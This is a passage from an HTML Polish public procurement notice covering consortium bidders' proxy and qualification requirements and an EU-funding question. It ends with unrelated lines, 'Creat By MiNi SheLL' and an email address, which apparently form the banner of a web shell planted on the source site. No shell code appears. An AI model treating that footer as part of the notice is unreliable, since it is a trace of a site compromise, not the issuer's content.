publicznego, upoważnienie to musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich Wykonawców, - wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako Pełnomocnik - należy podać adres do korespondencji z Pełnomocnikiem oraz numer faksu, - w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców oddzielnie musi udokumentować, że posiada uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Warunek posiadania wiedzy i doświadczenia, sytuacji ekonomicznej i finansowej, jak również dysponowania osobami zdolnymi do wykonania zamówienia przedsiębiorców w sumie, musi spełniać stawiane Wykonawcom warunki. Projekt nie jest finansowany ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com